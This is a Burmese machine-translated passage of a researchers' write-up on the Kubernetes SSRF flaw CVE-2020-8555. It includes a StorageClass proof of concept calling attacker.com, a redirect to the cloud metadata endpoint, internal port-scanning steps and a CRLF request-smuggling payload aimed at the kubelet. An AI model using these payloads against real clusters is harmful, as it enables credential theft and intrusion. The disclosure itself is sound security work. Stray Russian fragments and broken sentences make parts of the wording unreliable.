Kubernetes အားနည်းချက်များအကြောင်းသာမဟုတ်သည့်အခါ...

မှတ်ချက်။ ဘာသာပြန်: ဤဆောင်းပါး၏စာရေးဆရာများသည် အားနည်းချက်ကို ရှာဖွေတွေ့ရှိရန် စီမံပုံအကြောင်း အသေးစိတ်ကို ဆွေးနွေးကြသည်။ CVE-2020–8555 Kubernetes တွင် အစပိုင်းတွင် ၎င်းသည် အလွန်အန္တရာယ်များပုံမပေါ်သော်လည်း၊ အခြားအချက်များနှင့် ပေါင်းစပ်ကာ ၎င်း၏ဝေဖန်ချက်မှာ အချို့သော cloud ဝန်ဆောင်မှုပေးသူများအတွက် အများဆုံးဖြစ်လာခဲ့သည်။ အဖွဲ့အစည်းအများအပြားသည် ကျွမ်းကျင်ပညာရှင်များအား ၎င်းတို့၏အလုပ်အတွက် ရက်ရက်ရောရော ဆုချခဲ့ကြသည်။

ကျွန်ုပ်တို့ကဘယ်သူတွေလဲ

ကျွန်ုပ်တို့သည် Kubernetes တွင် အားနည်းချက်တစ်ခုကို ပူးတွဲရှာဖွေတွေ့ရှိခဲ့သော ပြင်သစ်လုံခြုံရေးသုတေသီနှစ်ဦးဖြစ်သည်။ ကျွန်ုပ်တို့၏အမည်များမှာ Brice Augras နှင့် Christophe Hauquiert ဖြစ်သော်လည်း Bug Bounty ပလပ်ဖောင်းအများအပြားတွင် ကျွန်ုပ်တို့ကို Reeverzax နှင့် Hach ဟူ၍ အသီးသီးခေါ်ဝေါ်ကြသည်-

• Brice Augras - Groupe Asten ကုမ္ပဏီ;
• Christophe Hauquiert - Nokia မှ Kubernetes ဗိသုကာပညာရှင်။

ဘာဖြစ်သွားတာလဲ?

ဤဆောင်းပါးသည် သာမန်သုတေသနပရောဂျက်တစ်ခုမှ မမျှော်လင့်ဘဲ ပိုးကောင်ရှာဖွေသူများ၏ဘဝတွင် စိတ်လှုပ်ရှားစရာအကောင်းဆုံးစွန့်စားခန်းအဖြစ်သို့ ပြောင်းလဲသွားပုံကို မျှဝေသည့်နည်းလမ်းဖြစ်သည်။

သင်သိသည့်အတိုင်း၊ ပိုးကောင်ရှာဖွေသူများတွင် ထင်ရှားသောအင်္ဂါရပ်အချို့ရှိသည်။

• ပီဇာနှင့် ဘီယာပေါ်တွင် နေထိုင်ကြသည်။
• တခြားသူတွေ အိပ်ပျော်သွားတဲ့အခါ အလုပ်လုပ်ကြတယ်။

ကျွန်ုပ်တို့သည် ဤစည်းမျဉ်းများအတွက် ခြွင်းချက်မဟုတ်ပါ- ကျွန်ုပ်တို့ များသောအားဖြင့် စနေ၊ သို့သော် ဤညများထဲမှ တစ်ခုသည် အလွန်ထူးခြားသော နည်းလမ်းဖြင့် အဆုံးသတ်ခဲ့သည်။

အစကတော့ ပူးပေါင်းပါဝင်ဆွေးနွေးဖို့ တွေ့ဆုံသွားမယ်။ CTF နောက်တစ်နေ့။ စီမံခန့်ခွဲထားသော ဝန်ဆောင်မှုပတ်ဝန်းကျင်ရှိ Kubernetes လုံခြုံရေးအကြောင်း စကားဝိုင်းတွင် ကျွန်ုပ်တို့သည် SSRF (အိုင်ဒီယာဟောင်းကို သတိရမိပါသည်။Server-Side Request Forgery) ၎င်းကို တိုက်ခိုက်ရေး ဇာတ်ညွှန်းအဖြစ် အသုံးပြုရန် ဆုံးဖြတ်ခဲ့သည်။

ည ၁၁ နာရီမှာ သုတေသနလုပ်ဖို့ ထိုင်ပြီး မနက်စောစော အိပ်ယာဝင်တော့ ရလဒ်ကို အရမ်းကျေနပ်တယ်။ ဤသုတေသနကြောင့် ကျွန်ုပ်တို့သည် MSRC Bug Bounty ပရိုဂရမ်ကို ဖြတ်ကျော်ပြီး အခွင့်ထူးတိုးမြင့်ခြင်းဆိုင်ရာ အသုံးချမှုတစ်ခု ရရှိလာသောကြောင့်ဖြစ်သည်။

ရက်သတ္တပတ်/လများစွာကြာပြီးနောက် ကျွန်ုပ်တို့၏မျှော်လင့်မထားသောရလဒ်သည် Azure Cloud Bug Bounty ၏သမိုင်းတစ်လျှောက်တွင် အမြင့်ဆုံးဆုများထဲမှတစ်ခုဖြစ်သည် - Kubernetes မှရရှိသည့်ဆုအပြင်၊

ကျွန်ုပ်တို့၏ သုတေသနပရောဂျက်ကို အခြေခံ၍ Kubernetes ထုတ်ကုန်လုံခြုံရေးကော်မတီမှ ထုတ်ပြန်ခဲ့သည်။ CVE-2020–8555.

အခုတွေ့ရှိထားတဲ့ အားနည်းချက်အကြောင်း အချက်အလက်တွေကို အတတ်နိုင်ဆုံး ဖြန့်ချင်ပါတယ်။ infosec အသိုင်းအဝိုင်း၏ အခြားအဖွဲ့ဝင်များနှင့် နည်းပညာဆိုင်ရာအသေးစိတ်အချက်အလက်များကို ရှာဖွေပြီး မျှဝေခြင်းအား သင်ကျေးဇူးတင်ကြောင်း ကျွန်ုပ်တို့မျှော်လင့်ပါသည်။

ဒါဆို ငါတို့ ဇာတ်လမ်းလေးပေါ့...

စကားစပ်

ဖြစ်ပျက်ခဲ့သမျှကို အနီးစပ်ဆုံးနားလည်စေရန်၊ cloud စီမံခန့်ခွဲသည့်ပတ်ဝန်းကျင်တွင် Kubernetes မည်သို့အလုပ်လုပ်သည်ကို ဦးစွာကြည့်ကြပါစို့။

ထိုသို့သောပတ်ဝန်းကျင်တွင် Kubernetes အစုအဝေးတစ်ခုကို သင် ချက်ချင်းလုပ်ဆောင်သောအခါ၊ စီမံခန့်ခွဲမှုအလွှာသည် ပုံမှန်အားဖြင့် cloud ဝန်ဆောင်မှုပေးသူ၏ တာဝန်ဖြစ်သည်-

ထိန်းချုပ်မှုအလွှာသည် cloud ဝန်ဆောင်မှုပေးသူ၏ ပတ်၀န်းကျင်တွင် တည်ရှိပြီး Kubernetes nodes များသည် သုံးစွဲသူ၏ ပတ်၀န်းကျင်တွင် တည်ရှိနေပါသည်။

volumes များကို ဒိုင်းနမစ်ကျကျခွဲဝေသတ်မှတ်ရန်အတွက်၊ ၎င်းတို့အား ပြင်ပသိုလှောင်မှုနောက်ကွယ်မှနေ၍ ၎င်းတို့အား ဒိုင်နိုက်ကျကျပံ့ပိုးပေးကာ PVC (ဆက်လက်တည်ရှိနေသောအသံအတိုးအကျယ်တောင်းဆိုမှု၊ ပမာဏတစ်ခုတောင်းဆိုမှု) နှင့် နှိုင်းယှဉ်ရန်အတွက် ယန္တရားတစ်ခုကိုအသုံးပြုသည်။

ထို့ကြောင့် PVC ကို ဖန်တီးပြီး K8s အစုအဝေးရှိ StorageClass နှင့် ချည်နှောင်ပြီးနောက်၊ ပမာဏကို ပေးဆောင်ရန် နောက်ထပ်လုပ်ဆောင်မှုများကို kube/cloud controller မန်နေဂျာမှ လွှဲပြောင်းယူသည် (၎င်း၏အမည်အတိအကျသည် ထွက်ရှိမှုအပေါ် မူတည်သည်)။ (မှတ်ချက်။ ဘာသာပြန်: ကျွန်ုပ်တို့သည် cloud ပံ့ပိုးပေးသူများအနက်မှ တစ်ခုအတွက် ၎င်း၏အကောင်အထည်ဖော်မှုနမူနာကို အသုံးပြု၍ CCM အကြောင်း ပိုမိုရေးသားထားပြီးဖြစ်သည်။ ဒီမှာ.)

Kubernetes မှပံ့ပိုးပေးသော ဝန်ဆောင်မှုပေးသူ အမျိုးအစားများစွာ ရှိသည်- အများစုမှာ ၎င်းတို့ထဲတွင် ပါဝင်ပါသည်။ သံစုံတီးဝိုင်း အူတိုင်အခြားသူများကို အစုအဝေးအတွင်း အချိတ်အဆက်တွင် ထည့်ထားသည့် အပိုပံ့ပိုးပေးသူများက စီမံခန့်ခွဲသော်လည်း၊

ကျွန်ုပ်တို့၏ သုတေသနတွင်၊ အောက်ဖော်ပြပါ ပုံတွင်ပြထားသည့် အတွင်းပိုင်း ပမာဏ ပံ့ပိုးပေးရေး ယန္တရားကို ကျွန်ုပ်တို့ အာရုံစိုက်ခဲ့သည်-

Built-in Kubernetes ဝန်ဆောင်မှုပေးသူကို အသုံးပြု၍ volumes များကို ဒိုင်းနမစ်ဖြင့် စီမံဆောင်ရွက်ပေးခြင်း။

အတိုချုပ်ပြောရလျှင် Kubernetes ကို စီမံခန့်ခွဲသည့်ပတ်ဝန်းကျင်တွင် အသုံးပြုသည့်အခါ ထိန်းချုပ်သူမန်နေဂျာသည် cloud ဝန်ဆောင်မှုပေးသူ၏တာဝန်ဖြစ်သည်၊ သို့သော် အသံအတိုးအကျယ်ဖန်တီးမှုတောင်းဆိုချက် (အထက်ပုံတွင် နံပါတ် 3) သည် cloud ဝန်ဆောင်မှုပေးသူ၏အတွင်းပိုင်းကွန်ရက်မှ ထွက်သွားပါသည်။ ပြီးတော့ ဒါက တကယ်ကို စိတ်ဝင်စားစရာကောင်းတဲ့ နေရာပါ။

ဟက်ကာဇာတ်လမ်း

ဤကဏ္ဍတွင်၊ အထက်ဖော်ပြပါ အလုပ်အသွားအလာကို အခွင့်ကောင်းယူ၍ cloud ဝန်ဆောင်မှုပေးသူ၏ အတွင်းပိုင်းအရင်းအမြစ်များကို ဝင်ရောက်ကြည့်ရှုပုံကို ရှင်းပြပါမည်။ အတွင်းအထောက်အထားများရယူခြင်း သို့မဟုတ် အခွင့်ထူးများတိုးမြင့်ခြင်းကဲ့သို့သော အချို့သောလုပ်ဆောင်ချက်များကို သင်မည်ကဲ့သို့လုပ်ဆောင်နိုင်သည်ကို ၎င်းသည် သင့်အားပြသမည်ဖြစ်သည်။

ရိုးရှင်းသော ခြယ်လှယ်မှုတစ်ခု (ဤကိစ္စတွင်၊ Service Side Request Forgery) သည် စီမံခန့်ခွဲထားသော K8s လက်အောက်ရှိ ဝန်ဆောင်မှုပေးသူများ၏ အစုအဝေးသို့ ဖောက်သည်ပတ်ဝန်းကျင်ကိုကျော်လွန်သွားစေရန် ကူညီပေးခဲ့ပါသည်။

ကျွန်ုပ်တို့၏သုတေသနတွင် ကျွန်ုပ်တို့သည် GlusterFS ပံ့ပိုးပေးသူကို အာရုံစိုက်ခဲ့သည်။ ဤအခြေအနေတွင် လုပ်ဆောင်ချက်များ၏နောက်ထပ် sequence ကိုဖော်ပြထားသော်လည်း Quobyte, StorageOS နှင့် ScaleIO တို့သည် တူညီသောအားနည်းချက်ကို ခံရနိုင်ချေရှိသည်။

ဒိုင်းနမစ်အသံအတိုးအကျယ် စီမံဆောင်ရွက်ပေးသည့် ယန္တရားအား အလွဲသုံးစားပြုခြင်း။

သိုလှောင်မှုအတန်းခွဲခြမ်းစိတ်ဖြာမှုအတွင်း GlusterFS Golang client အရင်းအမြစ်ကုဒ်တွင် ကျွန်ုပ်တို့ သတိပြုမိကန့်သတ်ချက်ရှိ စိတ်ကြိုက် URL ၏အဆုံးအထိ အသံအတိုးအကျယ်ဖန်တီးမှုအတွင်း ပထမဆုံး HTTP တောင်းဆိုချက် (၃) ခုကို ပေးပို့ခဲ့သည်။ resturl ထည့်သည် /volumes.

ပေါင်းထည့်ခြင်းဖြင့် ဤနောက်ထပ်လမ်းကြောင်းကို ဖယ်ရှားရန် ဆုံးဖြတ်ခဲ့သည်။ # parameter တွင် resturl. ဤသည်မှာ Semi-blind SSRF အားနည်းချက်အတွက် ကျွန်ုပ်တို့ စမ်းသပ်ခဲ့သော ပထမဆုံး YAML ဖွဲ့စည်းမှုပုံစံဖြစ်သည်။ (ဥပမာ သင်သည် Semi-blind သို့မဟုတ် half-blind SSRF အကြောင်း ပိုမိုဖတ်ရှုနိုင်သည်၊ ဥပမာ၊ ဒီမှာ - ခန့်မှန်းခြေ ဘာသာပြန်။):

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
  resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: poc-ssrf
spec:
  accessModes:
  - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 8Gi
  storageClassName: poc-ssrf

ထို့နောက် Kubernetes အစုအဝေးမှ စီမံခန့်ခွဲရန် binary ကို အသုံးပြုခဲ့သည်။ kubectl. ပုံမှန်အားဖြင့်၊ cloud ဝန်ဆောင်မှုပေးသူများ (Azure၊ Google၊ AWS စသည်) သည် သင့်အား ဤ utility တွင် အသုံးပြုရန်အတွက် အထောက်အထားများ ရယူရန် ခွင့်ပြုသည်။

ယင်းကြောင့် ကျွန်ုပ်သည် ကျွန်ုပ်၏ "အထူး" ဖိုင်ကို သုံးနိုင်ခဲ့ပါသည်။ Kube-controller-manager သည် ရရှိလာသော HTTP တောင်းဆိုချက်ကို လုပ်ဆောင်ခဲ့သည်-

kubectl create -f sc-poc.yaml

တိုက်ခိုက်သူ၏အမြင်မှ အဖြေ

၎င်းပြီးနောက် များမကြာမီတွင်၊ ညွှန်ကြားချက်များမှတစ်ဆင့် ပစ်မှတ်ဆာဗာမှ HTTP တုံ့ပြန်မှုကိုလည်း ကျွန်ုပ်တို့ လက်ခံနိုင်ခဲ့ပါသည်။ describe pvc သို့မဟုတ် get events kubectl တွင် အမှန်ပင်၊ ဤမူလ Kubernetes ဒရိုက်ဘာသည် ၎င်း၏သတိပေးချက်/အမှား မက်ဆေ့ချ်များတွင် အလွန်အကျုံးဝင်သည်...

ဒါကတော့ link တစ်ခုနဲ့ ဥပမာတစ်ခုပါ။ https://www.google.frကန့်သတ်ချက်အဖြစ် သတ်မှတ်သည်။ resturl:

kubectl describe pvc poc-ssrf
# или же можете воспользоваться kubectl get events

ဤချဉ်းကပ်မှုတွင်၊ ကျွန်ုပ်တို့သည် မေးခွန်းများကဲ့သို့ ကန့်သတ်ထားခဲ့သည်။ HTTP ပို့စ် ကုဒ်ပြန်ပေးလျှင် တုံ့ပြန်မှုကိုယ်ထည်၏ အကြောင်းအရာများကို မရနိုင်ပါ။ 201. ထို့ကြောင့်၊ ကျွန်ုပ်တို့သည် ထပ်လောင်းသုတေသနပြုလုပ်ပြီး ချဉ်းကပ်မှုအသစ်များဖြင့် ဤဟက်ကာဇာတ်လမ်းကို ချဲ့ထွင်ရန် ဆုံးဖြတ်ခဲ့သည်။

ကျွန်ုပ်တို့၏ သုတေသနပြုမှု တိုးတက်မှု

• Advanced Scenario #1- ပြင်ပဆာဗာတစ်ခုမှ 302 လမ်းကြောင်းလွှဲခြင်းကို အသုံးပြုခြင်း HTTP နည်းလမ်းကို ပြောင်းလဲရန် အတွင်းဒေတာစုဆောင်းရန် ပိုမိုလွယ်ကူသောနည်းလမ်းကို ပံ့ပိုးပေးသည်။
• Advanced Scenario #2- LAN scanning နှင့် internal resource ရှာဖွေမှုကို အလိုအလျောက်လုပ်ပါ။
• အဆင့်မြင့်အခြေအနေ #3- HTTP CRLF + မှောင်ခိုကူးခြင်း ("မှောင်ခိုတောင်းဆိုခြင်း") ကို အသုံးပြု၍ အံဝင်ခွင်ကျဖြစ်သော HTTP တောင်းဆိုမှုများကို ဖန်တီးကာ kube-controller မှတ်တမ်းများမှ ထုတ်ယူထားသော ဒေတာများကို ပြန်လည်ရယူရန်။

နည်းပညာဆိုင်ရာသတ်မှတ်ချက်များ

• သုတေသနသည် မြောက်ဥရောပဒေသရှိ Kubernetes ဗားရှင်း 1.12 ဖြင့် Azure Kubernetes Service (AKS) ကို အသုံးပြုခဲ့သည်။
• အထက်တွင်ဖော်ပြထားသော အခြေအနေများသည် Kubernetes ၏နောက်ဆုံးထွက်ရှိမှုများတွင် လုပ်ဆောင်ခဲ့သည်ဖြစ်သောကြောင့် တတိယအခြေအနေမှလွဲ၍ Golang ဗားရှင်း ≤ 1.12 ဖြင့် တည်ဆောက်ထားသော Kubernetes လိုအပ်သည်။
• တိုက်ခိုက်သူ၏ ပြင်ပဆာဗာ - https://attacker.com.

Advanced Scenario #1- အထိခိုက်မခံသောဒေတာကို ရယူရန်နှင့် လက်ခံရန်အတွက် HTTP POST တောင်းဆိုချက်ကို ပြန်ညွှန်းခြင်း။

မူလနည်းလမ်းကို ပြန်ရန်တိုက်ခိုက်သူ၏ဆာဗာ၏ဖွဲ့စည်းပုံဖြင့် ပိုမိုကောင်းမွန်လာပါသည်။ 302 HTTP RetcodePOST တောင်းဆိုချက်အား GET တောင်းဆိုချက်အဖြစ်သို့ ပြောင်းရန် (ပုံသေပုံတွင် အဆင့် 4)

ပထမတောင်းဆိုချက် (၃) သည် ဖောက်သည်ထံမှ လာခြင်းဖြစ်သည်။ GlusterFS (Controller Manager) တွင် POST အမျိုးအစားရှိသည်။ ဤအဆင့်များကို လိုက်နာခြင်းဖြင့် ၎င်းကို GET အဖြစ် ပြောင်းလဲနိုင်သည်-

• အတိုင်းအတာတစ်ခုအနေဖြင့် resturl StorageClass တွင်၎င်းကိုညွှန်ပြထားသည်။ http://attacker.com/redirect.php.
• အဆုံးမှတ် https://attacker.com/redirect.php အောက်ပါ Location Header ဖြင့် 302 HTTP အခြေအနေကုဒ်ဖြင့် တုံ့ပြန်သည်- http://169.254.169.254. ၎င်းသည် အခြားသော ဌာနတွင်း အရင်းအမြစ်များ ဖြစ်နိုင်သည် - ဤကိစ္စတွင်၊ ပြန်လည်ညွှန်းလင့်ခ်ကို နမူနာအဖြစ်သာ အသုံးပြုပါသည်။
• ပုံမှန်အားဖြင့် net/http စာကြည့်တိုက် Golang သည် တောင်းဆိုချက်ကို ပြန်ညွှန်းပြီး POST အား 302 အခြေအနေကုဒ်ဖြင့် GET အဖြစ်သို့ ပြောင်းလဲပေးကာ ရလဒ်အနေဖြင့် HTTP GET တောင်းဆိုချက်အား ပစ်မှတ်အရင်းအမြစ်သို့ ပြောင်းလဲစေသည်။

HTTP တုံ့ပြန်မှုကိုယ်ထည်ကို ဖတ်ရန် သင်လုပ်ဆောင်ရန် လိုအပ်သည်။ describe PVC အရာဝတ္ထု-

kubectl describe pvc xxx

ဤသည်မှာ ကျွန်ုပ်တို့လက်ခံနိုင်သည့် JSON ဖော်မတ်ရှိ HTTP တုံ့ပြန်မှု၏ ဥပမာတစ်ခုဖြစ်သည်။

ထိုအချိန်က တွေ့ရှိခဲ့သော အားနည်းချက်များ၏ စွမ်းဆောင်ရည်များသည် အောက်ပါအချက်များကြောင့် အကန့်အသတ်ရှိသည်-

• အထွက်တောင်းဆိုမှုတွင် HTTP ခေါင်းစီးများကို ထည့်သွင်း၍မရပါ။
• ကိုယ်ထည်အတွင်းရှိ ကန့်သတ်ဘောင်များပါရှိသော POST တောင်းဆိုမှုကို လုပ်ဆောင်နိုင်ခြင်း မရှိပါ (၎င်းသည် အသုံးပြုနေသည့် etcd instance တစ်ခုမှ သော့တန်ဖိုးကို တောင်းဆိုရန် အဆင်ပြေသည်။ 2379 အကယ်၍ ကုဒ်မထားသော HTTP ကို ​​အသုံးပြုပါက ပို့တ်။
• အခြေအနေကုဒ် 200 ဖြစ်သောအခါ တုံ့ပြန်မှုကိုယ်ထည်အကြောင်းအရာကို ပြန်လည်ရယူနိုင်စွမ်းမရှိသည့်အပြင် တုံ့ပြန်မှုတွင် JSON အကြောင်းအရာ-အမျိုးအစား မပါဝင်ပါ။

အဆင့်မြင့်အခြေအနေ #2- ဒေသတွင်းကွန်ရက်ကို စကင်န်ဖတ်ခြင်း။

တုံ့ပြန်မှုများအပေါ်အခြေခံ၍ ဤတစ်ဝက်ကန်းသော SSRF နည်းလမ်းကို cloud ဝန်ဆောင်မှုပေးသူ၏အတွင်းပိုင်းကွန်ရက်ကိုစကင်န်ဖတ်ပြီး တုံ့ပြန်မှုများအပေါ်အခြေခံ၍ အမျိုးမျိုးသောနားထောင်ခြင်းဝန်ဆောင်မှုများ (Metadata instance၊ Kubelet၊ စသည်ဖြင့်) ကို စစ်တမ်းကောက်ယူရန်အသုံးပြုခဲ့သည်။ kube ထိန်းချုပ်ကိရိယာ.

ပထမဦးစွာ၊ Kubernetes အစိတ်အပိုင်းများ၏ စံနားဆင်ခြင်းအပေါက်များ (8443၊ 10250၊ 10251 စသည်ဖြင့်) ကို ဆုံးဖြတ်ခဲ့ပြီး၊ ထို့နောက် ကျွန်ုပ်တို့သည် စကင်န်ဖတ်ခြင်းလုပ်ငန်းစဉ်ကို အလိုအလျောက်လုပ်ဆောင်ရမည်ဖြစ်သည်။

ဤအရင်းအမြစ်များကိုစကင်န်ဖတ်ခြင်းနည်းလမ်းသည် အလွန်တိကျပြီး ဂန္ထဝင်စကင်နာများနှင့် SSRF ကိရိယာများနှင့် ကိုက်ညီမှုမရှိသည်ကိုတွေ့မြင်ရသောကြောင့် လုပ်ငန်းစဉ်တစ်ခုလုံးကို အလိုအလျောက်ဖြစ်စေသော bash script ဖြင့် ကျွန်ုပ်တို့၏ကိုယ်ပိုင်ဝန်ထမ်းများကို ဖန်တီးရန် ဆုံးဖြတ်ခဲ့သည်။

ဥပမာအားဖြင့်၊ အတွင်းကွန်ရက်၏ အပိုင်းအခြား 172.16.0.0/12 ကို လျင်မြန်စွာ စကင်န်ဖတ်ရန်အတွက် အလုပ်သမား 15 ဦးကို အပြိုင်စတင်ခဲ့သည်။ အထက်ဖော်ပြပါ IP အပိုင်းအခြားကို နမူနာအဖြစ်သာ ရွေးချယ်ထားပြီး သင်၏ သီးခြားဝန်ဆောင်မှုပေးသူ၏ IP အပိုင်းအခြားသို့ ပြောင်းလဲသွားနိုင်ပါသည်။

IP လိပ်စာတစ်ခုနှင့် ဆိပ်ကမ်းတစ်ခုကို စကင်ဖတ်ရန်၊ သင်သည် အောက်ပါအတိုင်း လုပ်ဆောင်ရန် လိုအပ်သည်-

• နောက်ဆုံးစစ်ဆေးထားသော StorageClass ကို ဖျက်ပါ။
• ယခင်အတည်ပြုထားသော Persistent Volume အရေးဆိုမှုကို ဖယ်ရှားပါ။
• IP နှင့် Port တန်ဖိုးများကို ပြောင်းလဲပါ။ sc.yaml;
• IP နှင့် port အသစ်တစ်ခုဖြင့် StorageClass ကိုဖန်တီးပါ။
• PVC အသစ်ကိုဖန်တီးပါ။
• PVC အတွက် ဖော်ပြချက်ကို အသုံးပြု၍ စကင်န်ရလဒ်များကို ထုတ်ယူပါ။

အဆင့်မြင့်အခြေအနေ #3- CRLF ထိုးဆေး + Kubernetes အစုအဝေး၏ "အဟောင်း" ဗားရှင်းများတွင် HTTP မှောင်ခိုသွင်းခြင်း

၎င်းအပြင် အကယ်၍ ဝန်ဆောင်မှုပေးသူက K8s အစုအဝေး၏ ဗားရှင်းဟောင်းများကို ဖောက်သည်များအား ကမ်းလှမ်းခဲ့သည်။ и kube-controller-manager ၏မှတ်တမ်းများကို ၎င်းတို့အား ဝင်ရောက်ခွင့်ပေးခဲ့ပြီး၊ အကျိုးသက်ရောက်မှုသည် ပို၍ပင် သိသာလာသည်။

တိုက်ခိုက်သူသည် ၎င်း၏ဆန္ဒအတိုင်း HTTP တုံ့ပြန်မှုကို အပြည့်အဝရရှိရန် ဒီဇိုင်းထုတ်ထားသော HTTP တောင်းဆိုချက်များကို ပြောင်းလဲရန် အမှန်တကယ်ပင် ပို၍အဆင်ပြေပါသည်။

နောက်ဆုံးအခြေအနေအား အကောင်အထည်ဖော်ရန် အောက်ပါအခြေအနေများကို ဖြည့်ဆည်းပေးရမည်-

• အသုံးပြုသူသည် kube-controller-manager မှတ်တမ်းများ (ဥပမာ၊ Azure LogInsights တွင်) သို့ဝင်ရောက်ခွင့်ရှိရပါမည်။
• Kubernetes အစုအဝေးသည် 1.12 ထက်နိမ့်သော Golang ဗားရှင်းကို အသုံးပြုရပါမည်။

ကျွန်ုပ်တို့သည် GlusterFS Go ကလိုင်းယင့်နှင့် ပစ်မှတ်ဆာဗာအတုအကြား ဆက်သွယ်မှုကို အတုယူသည့် ဒေသတွင်းပတ်ဝန်းကျင်ကို ဖြန့်ကျက်ထားပါသည် (ယခုအချိန်တွင် ကျွန်ုပ်တို့သည် PoC ကို ထုတ်ဝေခြင်းမှ ရှောင်ကြဉ်ပါမည်)။

တွေ့ရှိခဲ့သည်။ အားနည်းချက်1.12 ထက်နိမ့်သော Golang ဗားရှင်းများကို ထိခိုက်စေပြီး HTTP မှောင်ခိုမှု/CRLF တိုက်ခိုက်မှုများကို ဟက်ကာများကို လုပ်ဆောင်ခွင့်ပေးသည်။

အထက်တွင်ဖော်ပြထားသော half-blind SSRF ကို ပေါင်းစပ်ခြင်းဖြင့် вместе ၎င်းနှင့်အတူ၊ ထို့နောက် kube-controller-manager မှ လုပ်ဆောင်ခဲ့သော ခေါင်းစီးများ၊ HTTP နည်းလမ်း၊ ကန့်သတ်ချက်များနှင့် ဒေတာများ အပါအဝင် ကျွန်ုပ်တို့၏ စိတ်ကြိုက် တောင်းဆိုချက်များကို ပေးပို့နိုင်ခဲ့ပါသည်။

ဤသည်မှာ ကန့်သတ်ဘောင်တစ်ခုရှိ အလုပ်လုပ်သော "ငါးစာ" ၏ ဥပမာတစ်ခုဖြစ်သည်။ resturl အလားတူ တိုက်ခိုက်မှု မြင်ကွင်းကို အကောင်အထည်ဖော်သည့် StorageClass၊

http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrn

ရလဒ်သည် အမှားတစ်ခုဖြစ်သည်။ မတောင်းဆိုသော တုံ့ပြန်မှုcontroller မှတ်တမ်းများတွင် မှတ်တမ်းတင်ထားသည့် အကြောင်း မက်ဆေ့ချ်။ မူရင်းအတိုင်း ဖွင့်ထားသည့် စကားလုံးအသုံးအနှုန်းကြောင့် HTTP တုံ့ပြန်မှုမက်ဆေ့ချ်၏ အကြောင်းအရာများကိုလည်း ထိုနေရာတွင် သိမ်းဆည်းထားသည်။

၎င်းသည် အယူအဆသက်သေပြမှုဘောင်အတွင်း ကျွန်ုပ်တို့၏ အထိရောက်ဆုံးသော "ငါးစာ" ဖြစ်သည်။

ဤချဉ်းကပ်မှုကို အသုံးပြုခြင်းဖြင့်၊ အမျိုးမျိုးသော စီမံခန့်ခွဲထားသော k8s ဝန်ဆောင်မှုပေးသူများ၏ အစုအဝေးများအပေါ်တွင် အောက်ပါတိုက်ခိုက်မှုအချို့ကို လုပ်ဆောင်နိုင်သည်- မက်တာဒေတာဖြစ်ရပ်များတွင် အထောက်အထားများနှင့်အတူ အခွင့်ထူးတိုးခြင်း၊ etcd master instances များတွင် (ကုဒ်မထားသော) HTTP တောင်းဆိုချက်များမှတစ်ဆင့် Master DoS စသည်တို့ကို လုပ်ဆောင်နိုင်ခဲ့သည်။

ဆိုးကျိုးများ

ကျွန်ုပ်တို့တွေ့ရှိခဲ့သော SSRF အားနည်းချက်နှင့်ပတ်သက်၍ Kubernetes ၏တရားဝင်ထုတ်ပြန်ချက်တွင် ၎င်းအား အဆင့်သတ်မှတ်ခဲ့သည်။ CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N။ Kubernetes ပတ်၀န်းကျင်နှင့် ဆက်စပ်နေသော အားနည်းချက်ကိုသာ သုံးသပ်ပါက၊ သမာဓိရှိမှု အားနည်းချက် (သမာဓိ vector) အဖြစ်အရည်အချင်းပြည့်မီသည်။ အဘယ်သူမျှမ.

သို့သော်လည်း၊ စီမံခန့်ခွဲထားသော ဝန်ဆောင်မှုပတ်ဝန်းကျင်တွင် ဖြစ်နိုင်ခြေရှိသော အကျိုးဆက်များကို အကဲဖြတ်ခြင်း (၎င်းသည် ကျွန်ုပ်တို့၏ သုတေသနပြုမှု၏ စိတ်ဝင်စားစရာအကောင်းဆုံး အစိတ်အပိုင်းဖြစ်သည်!) အားနည်းချက်ကို အဆင့်သတ်မှတ်ချက်အဖြစ် ပြန်လည်ခွဲခြားသတ်မှတ်ရန် ကျွန်ုပ်တို့ကို လှုံ့ဆော်ပေးခဲ့သည်။ အရေးပါသော CVSS10/10 ဖြန့်ဖြူးသူအများအပြားအတွက်။

Cloud ပတ်ဝန်းကျင်များတွင် ဖြစ်နိုင်ချေရှိသော သက်ရောက်မှုများကို အကဲဖြတ်သည့်အခါ ကျွန်ုပ်တို့၏ ထည့်သွင်းစဉ်းစားချက်များကို နားလည်ရန် ကူညီပေးရန်အတွက် အောက်တွင်ဖော်ပြထားသော အချက်အလက်များသည် ထပ်လောင်းအချက်အလက်များဖြစ်ပါသည်။

သမာဓိ

• ရယူထားသော အတွင်းပိုင်းအထောက်အထားများကို အသုံးပြု၍ အဝေးမှ ညွှန်ကြားချက်များကို လုပ်ဆောင်ပါ။
• IDOR (Insecure Direct Object Reference) နည်းလမ်းကို အသုံးပြု၍ အထက်ဖော်ပြပါ မြင်ကွင်းကို ဒေသတွင်း ကွန်ရက်ပေါ်တွင် တွေ့ရှိရသည့် အခြားအရင်းအမြစ်များဖြင့် ပြန်လည်ထုတ်ဝေခြင်း။

လျှို့ဝှက်ခြင်း

• တိုက်ခိုက်မှုအမျိုးအစား နှစ် ဦး နှစ်ဖက်လှုပ်ရှားမှု cloud အထောက်အထားများ ခိုးယူခြင်း (ဥပမာ၊ မက်တာဒေတာ API) ကြောင့်။
• ဒေသတွင်းကွန်ရက်ကိုစကင်န်ဖတ်ခြင်းဖြင့် အချက်အလက်စုဆောင်းခြင်း (SSH ဗားရှင်း၊ HTTP ဆာဗာဗားရှင်း၊ ...)
• မက်တာဒေတာ API ကဲ့သို့သော အတွင်းပိုင်း API များကို စစ်တမ်းကောက်ယူခြင်းဖြင့် ဥပမာနှင့် အခြေခံအဆောက်အအုံဆိုင်ရာ အချက်အလက်များကို စုဆောင်းပါ။http://169.254.169.254, ... ) ။
• cloud အထောက်အထားများကို အသုံးပြု၍ သုံးစွဲသူဒေတာကို ခိုးယူခြင်း။

အသုံးပြုနိုင်မှု

